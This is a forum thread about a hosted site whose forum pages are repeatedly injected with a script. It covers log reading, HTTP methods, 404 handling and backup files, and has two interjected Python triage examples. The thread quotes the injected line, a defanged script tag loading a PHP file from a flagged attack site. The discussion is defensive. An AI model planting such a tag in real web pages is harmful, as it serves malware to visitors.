Ok, I see you already have a way to search the database. I’d look for any JavaScript or VBScript code at all. Also anything that isn’t plain text or variable values. Technically, you’re looking for whatever code is being injected, but it might not be in a form that is easy to spot.
The site appears to have some unused content, or duplication, or “something”; for example, there is a /forum/ directory and also /forums/. Anything that is not in active use should be deleted. A vulnerable file remains vulnerable as long as it’s there, even if you’ve removed all hyperlinks that point to it.
Don’t give up on getting the logs. Since they hold the possibility of finding out how the site is being attacked over and over, and the database doesn’t, the logs are more important.
I’m not sure where you’re seeing /forum/ and /forums/. I’m looking at GoDaddy’s Java FTP client (which is the only way I can see /stats/ and /logs/, as neither shows up in the GoDaddy File Manager). I see only /forum/. I shouldn’t have any duplication. I burned the site down to just an index file and /stats/ not too long ago to try and figure out where vulnerabilities were. I was reinfected at that point and so uploaded only what was necessary after that, with no duplications at that time.
I’ve got the logs now. It’s pretty complicated. I’m not really sure what I’m looking at though. A lot of it seems to do with the forum, which is expected I suppose. 98% of it seems to be a GET, until there’s a POST on /Forum/default.aspx every so often. I don’t know if that’s a login to the forum, or if it’s just listing actions taken from the control panel, or if there should be zero POSTs.
A lot of them start by trying to get robots.txt which doesn’t exist.
What I’ve also just noticed is that there’s a php call in the forum again.
http://iwvision.com/images/nt1/title-portfolio.php
iwvision.com is listed by google as an attack site.
Several forum files have been edited today at approximately 6:30 am Eastern according to their last modified dates on GoDaddy. I uploaded fresh copies of those yesterday, not today. It appears to be 3 aspx files in /forum/: advanced.aspx, default.aspx, and error.aspx.
Unfortunately I can’t view the logs for the 29th (today) until tomorrow.
I use a download tool that is configured to follow links and recreate your server’s directory structure here as the files are downloaded. It created both a /forum/ folder and also /forums/.
There is some very weird activity going on.
When I request /forums/ in Firefox, it produces what appears to be an endless chain of recursive calls to your files (not to an external site, as far as I can tell) that creates a huge amount of back and forth traffic between me and your server, which hangs up Firefox, disrupts my screen display, and forces me to manually close Firefox.
The same thing happens when I request /foruma/, so this behavior seems to occur when a nonexistent folder is requested out of the forum.
If I request a nonexistent file from your site like nopage.html, I get a 200 Success result code (which is however incorrect) and it redirects to your home page. So “Not Found” errors are being handled differently by your main site and by your forum. The main site handling is technically wrong and should be fixed to return no page at all and a “404” result code. But the forum’s handling of 404’s is so bad that Google would indeed consider it malicious even if it is only inadvertent.
Take a close look at how your site (probably in your .asp code?) handles 404 – Not Found errors, and especially how YAF code is handling the same.
This seems to be a separate issue from the script insertions, at least from what I’ve seen so far.
On your forum pages, there is a reference to a script from iwvision.com inserted before the body tag of each page. The script is called automatically when the page is loaded. Since they’re a flagged site, and your site loads this script automatically, if their site is flagged and has malware, you’ll get flagged, too.
Here’s the surrounding code, somewhat altered:
As expected, the forum editor tore it to pieces, so I removed it. Anyway, you can View Source on any forum page. Here’s the offending line:
script src=hxxp :// iw vision . com / images / nt1 / title-portfolio . php
Yep. I saw that (see my previous post). I was leaving it there briefly so I wouldn’t have any good data in the access logs now that I was able to get at them. I also wanted you to see what I was getting, since last time you didn’t see it because I’d cleaned things out. Several ASPX files have modified dates of early on the morning of the 29th.
Any more thoughts on prevention? I’m not 100% sure what I’m looking for in the logs since it’s 99% GETs and then an occasional PUT on default.aspx in the forum, which I’m assuming is a post or a login, but I can’t be certain.
What I’m noticing that is bizarre about the logs is the timestamps on them.
Jun2009 Logs: November 29
July2009 Logs: August 1
Aug2009 Logs: August 31
Sept2009 Logs: September 30
Oct2009 Logs: October 31
November2009 Logs: November 29
Why is the June Log dated November 29th? Peculiar I think.
There are no posts close to 6:30, only gets.
As for the /forums/ issue, I don’t think it has anything to do with the forums. Go to /random/ or /anything/. As far as the forum is concerned, only /forum/ exists. I set it so that it believes /forum/ is root. /random/ would have nothing to do with the forum. However, I managed to load /random/ and then view its source. It appears that what it’s doing is redirecting any blank page to ~/index.html, but since index.html is calling relative pages in frames, it results in calling more index.html. I might be able to fix that by having /index.html call absolute links or by making /index just a splash page and then going to the main page via a link. I have no clue why it does that, but I’m pretty sure it’s unrelated to the forums.
As for my database, I can back it up and download the backup to go through it that way. Is there a program I could easily read it in? Or will I have to run SQL on my desktop? When I open it in gedit or notepad, it’s broken up with spaces between each character and is difficult to read. Alternatively I could read it on the server but that’s a slow process. If that’s how it has to be though, it’s doable.
Finally a bit more on IIS, according to GoDaddy, for security reasons they don’t allow IIS manager on IIS7, but they do on IIS6. But I recall seeing somewhere that that was allowed on accounts using IIS6. I don’t really know what that’s talking about specifically, but I am drawn to wonder if that’s a potential hole in this case, especially since you said you’d seen a good number of attacks against IIS6 users and IIS in general.
“Several ASPX files have modified dates of early on the morning of the 29th.”
“Why is the June Log dated November 29th? Peculiar I think.”
Yes, both of those do not seem normal.
“an occasional put on default.aspx in the forum which i’m assuming is a post or a login”
A forum login would most likely be a POST (not a forum post, but an HTTP “POST”, in the same sense that a GET is an HTTP GET). An HTTP PUT is worrisome because it is an instruction to the server to take the provided file and PUT it on the server. The server should NEVER allow that. In those entries there should be a number of “403” in the line, meaning Forbidden (the server did not honor the request). If it is instead a result code of 200, that could be bad. If the file has a timestamp that is the same as the PUT request, that means the server seems to be allowing something it absolutely should not, and it will require reconfiguration, probably by the host unless this is somehow handled in your ASP code. I would think that accepting a PUT would be a highly unusual and near impossible misconfiguration, but the fact that you stripped the site down to 1 html file, changed passwords, logged in from a linux PC, and it still got injected, makes weird scenarios seem more plausible.
This describes the possible result codes: http://en.wikipedia.org/wiki/List_of_HTTP_status_codes
For interpreting the logs, this link looks helpful, but I simply got it from a web search on “IIS log explain”, so you might be able to find others: http://www.microsoft.com/windows/windows2000/en/advanced/iis/htm/core/iiabtlg.htm
“As for my database, I can back it up and download the backup to go through it that way. Is there a program I could easily read it in? Or will I have to run SQL on my desktop? When I open it in gedit or notepad, it’s broken up with spaces between each character and is difficult to read. Alternatively I could read it on the server but that’s a slow process. If that’s how it has to be though, it’s doable.”
The spaces between chars might be due to Unicode 16-bit text encoding with the in-between spaces actually being null bytes 00. It might be possible to either specify which encoding your editor should use, or maybe convert it by using SaveAs… Could be worth a try in Notepad, WordPad, gedit, or BlueFish. Does the file have an “.sql” extension?
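As an added example (not part of the thread), here is a small Python triage script for the two checks described above: PUT requests the server did not refuse, and PUT/POST requests that hit a file shortly before that file’s last-modified time. The log lines and modification times are constructed sample data in IIS W3C format; real logs would be read from the /logs/ folder instead.

```python
"""Triage helper for IIS W3C extended logs (added example, not from the thread).

Flags HTTP PUT requests that were not refused (sc-status != 403) and write-type
requests (PUT/POST) that land on a file shortly before its last-modified time.
"""
from datetime import datetime, timedelta

# Constructed IIS W3C log excerpt; the #Fields header names the columns.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2009-11-29 06:12:04 GET /robots.txt - 203.0.113.5 404
2009-11-29 06:27:51 POST /forum/default.aspx - 203.0.113.5 200
2009-11-29 06:29:10 PUT /forum/advanced.aspx - 203.0.113.5 403
2009-11-29 06:29:12 PUT /forum/error.aspx - 203.0.113.5 201
2009-11-29 09:00:00 GET /forum/default.aspx - 198.51.100.7 200
"""

# Constructed last-modified times (what the FTP client shows for each file).
SAMPLE_MTIMES = {
    "/forum/default.aspx": datetime(2009, 11, 29, 6, 30, 0),
    "/forum/advanced.aspx": datetime(2009, 11, 28, 14, 0, 0),
    "/forum/error.aspx": datetime(2009, 11, 29, 6, 30, 5),
}

WRITE_METHODS = {"PUT", "POST"}


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def triage(log_text, mtimes, window=timedelta(minutes=5)):
    """Return (unrefused PUTs, write requests that precede a file change)."""
    bad_puts, suspicious_writes = [], []
    for rec in parse_iis_log(log_text):
        method, path = rec["cs-method"], rec["cs-uri-stem"]
        when = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        if method == "PUT" and rec["sc-status"] != "403":
            bad_puts.append((when, path, rec["sc-status"]))
        mtime = mtimes.get(path)
        # A write request within `window` before the file changed is worth a look.
        if method in WRITE_METHODS and mtime and timedelta(0) <= mtime - when <= window:
            suspicious_writes.append((when, method, path))
    return bad_puts, suspicious_writes
```

A 403 on a PUT is the server refusing it; anything else on a PUT, or a POST that lines up with a changed .aspx file, is what to chase in the host’s configuration or the forum code.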
My mistake. It wasn’t a PUT, it was a POST. I don’t know what possessed me to type PUT.
The file has a .bak extension.
I opened it up in Open Office Writer using Unicode encryption. I can read parts of it, but other parts are just garbage. Mostly #s that are breaking up sections. So I’ll get a post and then a bunch of # and other garbage before another post, or I’ll get what I think is user data, broken up by the same.
It also seems that only parts of the bak file are encrypted. When I view it with Unicode encryption I can read posts etc. with the issue I mentioned before, but parts of the file become unreadable. Those parts are viewable as plain text. The parts that I can view in plain text appear to be the actual guts of the database.
Broken in among that, though, are parts that appear to be Unicode and have somewhat strange things in them. I can pick out words like “CALGARY”, “VERIZON”, “CAGE BY PET TREX” and also what appears to be addresses.
The parts that look like they’re the guts of the database also have some random bits of garbage broken in between sections. There’ll be an “END” followed by garbage, followed by a “BEGIN”.
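As an added example (not part of the thread), the mixed readable/garbage view described above is what you get when 8-bit text and UTF-16LE text (each character followed by a null byte, which an editor shows as a blank) sit side by side in a binary backup. This Python carves both kinds of string out of a byte blob, much as `strings` and `strings -el` would; the blob is constructed sample data.

```python
"""Carve 8-bit and UTF-16LE text out of a binary backup (added example, not
from the thread). The sample blob is constructed to mimic a .bak with mixed
plain-text fragments, binary padding and UTF-16LE (nvarchar) text.
"""
import re

SAMPLE_BAK = (
    b"BEGIN TRANSACTION\x00\x00\x07\xff\x12"
    + "Post body: forum software update".encode("utf-16-le")
    + b"\x00\x00\xfe\x03"
    + "CALGARY".encode("utf-16-le")
    + b"\x9aEND OF FILE\x00"
)

# Four or more consecutive printable ASCII bytes.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
# A printable byte followed by 0x00, four or more times: the UTF-16LE pattern
# that shows up in a text editor as "c h a r a c t e r s".
UTF16LE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def carve_strings(blob):
    """Return (ascii_strings, utf16_strings) found anywhere in a byte blob."""
    ascii_hits = [m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)]
    utf16_hits = [m.group().decode("utf-16-le") for m in UTF16LE_RUN.finditer(blob)]
    return ascii_hits, utf16_hits


def carve_file(path):
    """Convenience wrapper: carve strings from a file on disk."""
    with open(path, "rb") as fh:
        return carve_strings(fh.read())


if __name__ == "__main__":
    plain, wide = carve_strings(SAMPLE_BAK)
    for s in plain:
        print("8-bit :", s)
    for s in wide:
        print("UTF-16:", s)
```

Running this over the real .bak (carve_file) and grepping the output for “script” or “iwvision” is a quicker way to hunt the injected content than paging through the database on the server.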
Out of curiosity, did you ever figure out if GoDaddy is the culprit? I’m having the same problem with several of my GD hosting accounts. Avast keeps flagging these inserted scripts as an iFrame trojan. I’ve changed my passwords multiple times and reloaded fresh copies of the HTML pages, but after a certain amount of time, the script is re-inserted and Avast flags them again as the same malware type.
Sample of the script is below…